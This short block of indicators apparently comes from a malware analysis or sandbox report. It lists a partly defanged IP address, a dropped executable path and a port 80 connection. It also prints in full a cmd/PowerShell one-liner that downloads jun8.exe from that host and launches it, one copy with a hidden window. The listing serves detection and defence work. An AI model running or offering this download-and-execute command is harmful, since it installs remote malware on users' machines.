Technical Information
- http://18#.#1.113.94/jun8.exe as %temp%\zjuqsxy.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://18#.#1.113.94/jun8.exe','%TMP%\Zjuqsxy.exe');Start-Process '%TMP%\Zjuqsxy.exe';
- '18#.#1.113.94':80
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://18#.#1.113.94/jun8.exe','%TMP%\Zjuqsxy.exe');Start-Process '%TMP%\Zjuqsxy.exe';' (with hidden window)